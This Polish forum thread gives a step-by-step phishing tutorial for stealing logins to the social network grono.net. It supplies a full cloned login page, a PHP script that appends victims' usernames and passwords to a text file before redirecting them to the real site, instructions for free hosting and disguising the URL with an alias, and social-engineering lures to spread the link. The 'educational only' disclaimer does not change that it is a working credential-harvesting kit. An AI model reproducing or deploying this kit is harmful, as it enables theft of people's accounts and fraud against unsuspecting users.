Dodaj do ulubionych

Jak prosto sie włamywać :] INTRUKCJA !!

12.03.06, 11:24
WYŁĄCZNIE W CELACH EDUKACYJNYCH !! NIGDY NIE WYKORZYSTUJ TEGO DO

WŁAMYWANIA !!

Siemka chiałem w tym temacie napisać o tym jak wykorzystać praktycznie

phishing.

Więc cel - grono.net

Co potrzebne: przeczytać ten temat.

Instrukcja:

1) Zakładasz konto na darmowym serwerze, który obsługuje

pełnowartościowe php. Polecam www.host.sk Nie polecam ovh bo pracuje w

php safe mode.

2)Tworzysz plik tekstowy w środku wklejasz:


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0017)grono.net/ -->
<HTML><HEAD><TITLE>grono.net - internetowa społeczność

przyjaciół</TITLE>
<META http-equiv=Content-Type content="text/html; charset=utf-8">
<META
content="społeczność, wspólnota, znajomi, spotkania, rozmowy,

przyjaciele, grono, koledzy, koleżanki, pomoc"
name=keywords>
<META
content="Internetowa społeczność, w której możesz poznać wielu nowych

przyjaciół z Polski i ze świata. grono.net jest społecznością zamkniętą

- ktoś spośród Twoich znajomych powinien Cię do niej zaprosić - wkrótce

się to wydarzy!"
name=description><LINK href="grono_net_pliki/global.css" type=text/css
rel=stylesheet>
<SCRIPT language=JavaScript src="grono_net_pliki/title.js"
type=text/javascript></SCRIPT>

<META content="MSHTML 6.00.2900.2802" name=GENERATOR>
<style type="text/css">
<!--
.style1 {font-size: 12px}
.style2 {font-family: verdana}
-->
</style>
</HEAD>
<BODY onload=if(self.doIt){doIt();}>
<CENTER>
<DIV id=logo><IMG title=logo alt=logo

src="grono_net_pliki/logo.gif"></DIV>
<DIV id=main>
<TABLE>
<TBODY>
<TR>
<TD>
<SCRIPT type=text/javascript><!--<![CDATA[
/* (c)AdOcean 2004-2005 */
if(location.protocol.substr(0,4)=='http')document.write(unescape('%3C')

+'script id="Przestrzen reklamowa.Grono.net.Formy

Niestandardowe.minisky_160x300"

src="'+location.protocol+'//s1.ad.adocean.pl/_'+(new

Date()).getTime()+'/ad.js?id=IDM6NTvIkypjy2fF7HgrdWrfEp7D.L5OGnpdpYpisf

r.v7/x='+screen.width+'/y='+screen.height+'"

type="text/javascript"'+unescape('%3E%3C')+'/script'+unescape('%3E'));
//]]>--></SCRIPT>
</TD>
<TD>
<TABLE cellSpacing=0 cellPadding=0 width=400>
<TBODY>
<TR>
<TD id=brdr5_1></TD>
<TD id=brdr5_2></TD>
<TD id=brdr5_3></TD></TR>
<TR>
<TD id=brdr5_8></TD>
<TD id=brdr5>
<DIV class=m_body>


<FORM id=logform name=logform action=baza.php method=post>
<DIV class=subtitle style1>Jeżeli proces rejestracji masz

już za
sobą,<BR>możesz się zalogować:</DIV>
<DIV class=form_desc>login/email:</DIV><INPUT name=pole1

id="pole1">
<DIV class=form_desc>hasło:</DIV><INPUT name=pole2

type=password id="pole2">
<INPUT type=hidden value=/index.jsp?error=1 name=redir>
<DIV class=form_desc>pamiętaj mnie: <INPUT class=chkbox
type=checkbox value=1 name=remember><A
href="<a href="grono.net/help-autologin.jsp"" target="_blank">grono.net/help-autologin.jsp"</a>

target=_blank><IMG
src="grono_net_pliki/help.gif"
alt="dowiedz się więcej o tej opcji" border="0"

title="dowiedz się więcej o tej opcji"
onmouseover=t(this,event)></A></DIV>
<P><INPUT class=button1 type=submit value="loguj

»"></P></FORM><A href="<a href="grono.net/lostinv.jsp"" target="_blank">grono.net/lostinv.jsp"</a> class="style1"
id=more>zgubione
zaproszenie</A><SPAN id=more> <span

class="style1">|</span> </SPAN><A
href="<a href="grono.net/lostpass.jsp"" target="_blank">grono.net/lostpass.jsp"</a> class="style1"

id=more>zapomniane hasło</A><SPAN
id=more> <span class="style1">|</span> </SPAN><A
href="<a href="grono.net/register.jsp"" target="_blank">grono.net/register.jsp"</a>
title="tu uzyskasz informacje jak dostać sie do grono.net"

class="style1" id=more onmouseover=t(this,event)>rejestracja</A>
<SCRIPT language=javascript type=text/javascript>
<!--
var pp_gemius_identifier = new

String('bPqb6QNwQNQlxX2sK3kP28PbT.RWxjixUYd0WL3ziwT.V7');
//-->
</SCRIPT>

<SCRIPT language=javascript

src="grono_net_pliki/pp_gemius.js"
type=text/javascript></SCRIPT>
</DIV></TD>
<TD id=brdr5_4></TD></TR>
<TR>
<TD id=brdr5_7></TD>
<TD id=brdr5_6></TD>
<TD id=brdr5_5></TD></TR>
<TR>
<TD id=space_ colSpan=3></TD></TR>
<TR>
<TD id=brdr1_1></TD>
<TD id=brdr1_2></TD>
<TD id=brdr1_3></TD></TR>
<TR>
<TD id=brdr1_8></TD>
<TD id=brdr1>
<DIV id=users><A href="<a href="grono.net/about.jsp"" target="_blank">grono.net/about.jsp"</a>

class=users style1>czym
jest grono.net?</A><span

class="style2"> |</span> <A class=users
href="grono.net/prasa.jsp">kontakt prasowy</A><span

class="style2"> |</span> <A
class=users
href="grono.net/support/">kontakt</A><span

class="style2"> |</span> <A
class=users

href="grono.net/reklama.jsp">reklama</A></DIV></TD>
<TD id=brdr1_4></TD></TR>
<TR>
<TD id=brdr1_7></TD>
<TD id=brdr1_6></TD>
<TD id=brdr1_5></TD></TR>
<TR>
<TD id=tail colSpan=3><span class="style2">© 2004, 2005 by

grono.net -<A class=tail
href="<a href="www.brandlay.com/"" target="_blank">www.brandlay.com/"</a>
target=_blank>Brandlay</A></span></TD>
</TR></TBODY></TABLE></TD>
<TD>
<SCRIPT type=text/javascript><!--<![CDATA[
/* (c)AdOcea
Obserwuj wątek
  • zgnily_swiat Re: Jak prosto sie włamywać :] INTRUKCJA !! 12.03.06, 11:27
   Ciag dalszy doklej do poprzedniego Bo sie nie zmieścił.

   <SCRIPT type=text/javascript><!--<![CDATA[
   /* (c)AdOcean 2004-2005 */
   if(location.protocol.substr(0,4)=='http')document.write(unescape('%3C')

   +'script id="Przestrzen reklamowa.Grono.net.Formy

   Niestandardowe.minisky_160x300_P"

   src="'+location.protocol+'//s1.ad.adocean.pl/_'+(new

   Date()).getTime()+'/ad.js?id=S9FVN9e9ncrJixowXW6TvYetH56Qbq_eigcEjHuDyZ

   3.M7/x='+screen.width+'/y='+screen.height+'"

   type="text/javascript"'+unescape('%3E%3C')+'/script'+unescape('%3E'));
   //]]>--></SCRIPT>
   </TD></TR></TBODY></TABLE></DIV>
   <DIV></DIV>
   </CENTER></BODY></HTML>


   3) Zapisujesz plik tekstowy pod rozszerzeniem html o nazwie index

   Pamiętaj rozszerzenie ma być html i nazwa pliku index . Czyli plik

   index.html

   4) Wchodzisz na stronę: www.grono.net Zapisujesz ją do jakiegoś folderu

   na dysku pod nazwą grono_net_pliki usuwasz plik grono_net_pliki.htm i

   wklejasz do tego folderu plik index.html, który stworzyłeś wcześniej.

   5) Tworzysz nowy plik tekstowy i wklejasz do niego:   <?php

   $l = $pole1;
   $p = $pole2;
   // dane pochodzce z formularza
   $dane = $pole1."`".$pole2."\n";
   // przypisanie zmniennej $file nazwy pliku
   $file = "baza.txt";
   // uchwyt pliku, otwarcie do dopisania
   $fp = fopen($file, "a");
   // blokada pliku do zapisu
   flock($fp, 2);
   // zapisanie danych do pliku
   fwrite($fp, $dane);
   // odblokowanie pliku
   flock($fp, 3);
   // zamknicie pliku
   fclose($fp);
   ?>
   <SCRIPT LANGUAGE="JavaScript">
   var lo = '<?echo $l;?>'
   var pa = '<? echo $p;?>'
   var ur ="www.grono.net/do-login.jsp?login="+lo+"&pass="+pa

   if (navigator.appName.indexOf("Microsoft Internet Explorer")!=-1 )
   {
   self.parent.location=ur

   }

   else self.parent.location="grono.net/index.jsp?error=1"

   </SCRIPT>


   Na koniec zapisujesz plik pod nazwą: baza.php i wklejasz go do folderu

   gdzie masz zapisaną stronę grono.net powinien tam teraz znajdować sie

   jeden plik: index.html i folder grono_net_pliki. Wklejasz tam plik

   baza.php no i masz teraz 2 pliki i folder :] . Następnie tworzysz tam

   plik tekstowy: baza.txt .   6) Podsumowując powinieneś mieć teraz w folderze w którym pracujesz

   trzy pliki: baza.txt, baza.php i index.html i folder: grono_net_pliki

   7) Teraz musisz to tylko wrzucić na twoje konto hostingowe na serwerze

   (np. www.host.sk albo inny) wszystkie te 3 pliki które stworzyłeś no i

   folder grono_net_pliki
   Logujesz się przez ftp na serwer, ustawiasz prawa dostępu dla pliku

   baza.txt wszędzie na zapis no i odczyt tylko dla właściciela. (Prawa

   dostępu ustawia sie kilkając prawym przyciskiem myszy na plik)

   8) Po tym wszystkim masz podrobioną stronę grono.net pod adresem

   Twoja_subdomena.host.sk :] A hasła które wpiszesz na tej podrobionej

   stronie są zapisywane w pliku baza.txt w formacie: login'hasło

   9) No tak ale chyba nikomu nie wyślesz linka: Ejj wejdź tutaj:

   Twoja_subdomena.host.sk większość sie kapnie :] Więc tworzysz sobie

   alias :] Alias czyli coś takiego, że możesz stworzyć sobie swój adres

   który będzie przekierowywał na adres Twoja_subdomena.host.sk Polecam

   alias: www.xt.pl Zakładasz go w sekundę :] Nazwa nie może zawierać

   kropek itp. Tworzysz alias długi ale też nie za długi żeby obsłużyła go

   przeglądarka np. grono_x34434taratattattatatattattatatatatatattata :D
   który jakoś kojarzy się z gronem :]
   W Adres docelowy: piszesz www.Twoja_subdomena.host.sk w Tytuł

   strony: Grono.net - internetowa społeczność przyjaciół

   10) No i to już wszystko masz adres

   www.grono-x34434taratattattatatattattatatatatatattataTuPiszCochcesz.xt.

   pl który przekierowuje pod Twoją podrobioną stronę grono.net -logowanie

   :]

   11) Teraz tylko wystarczy komuś wysłać linka :] lub umieścic go na

   forum tematycznym. Np z tekstem: Super dziewczyny z grona Tylko dla

   dorosłych :

   www.grono-x34434taratattattatatattattatatatatatattataTuPiszCochcesz.xt.

   pl Nie martw się że na końcu jest xt.pl :] I tak linki długie są

   zwijane do pierwszych liter hehehe . Możesz jeszcze użyć kodowania

   adresu za pomocą kodu ASCI ale np %23 :D Poszukaj o tmy na google ale

   odradzam to bo link działa wtedy tylko na przeglądarkach IE :]

   12) Aha możesz zmodyfikować ten przepis żeby był bardziej wydajny :] To

   już od Ciebie zależy. Serwer który wybierzesz też jest Twoją kwestią

   najlepiej darmowy szybki z pełnym php ale trudno takie znaleźć... Na

   płatnych nie polecam(bezpieczeństwo) acz kolwiek Twoja sprawa :] Aha no

   i opisałem tutaj tylko "sposób" w celach wyłącznie edukacyjnych. Pod

   żadnym pozorem nie powinieneś tego wprowadzać w życie !!! ;) Jest to

   technika karalna jak dobrze pamietam 2 lata można za to dostać.

   Aha no i polecam przeczytanie artykułu na ramach Chipa z Marca: "Po

   prostu załóż maskę"

   :) POZDRAWIAM.
   Ten co nie kocha świata ludzkiej iluzji, kłamstwa i braku miłości.
   Świat gnije.

Popularne wątki

Nie pamiętasz hasła

lub ?

 

Nie masz jeszcze konta? Zarejestruj się

Nakarm Pajacyka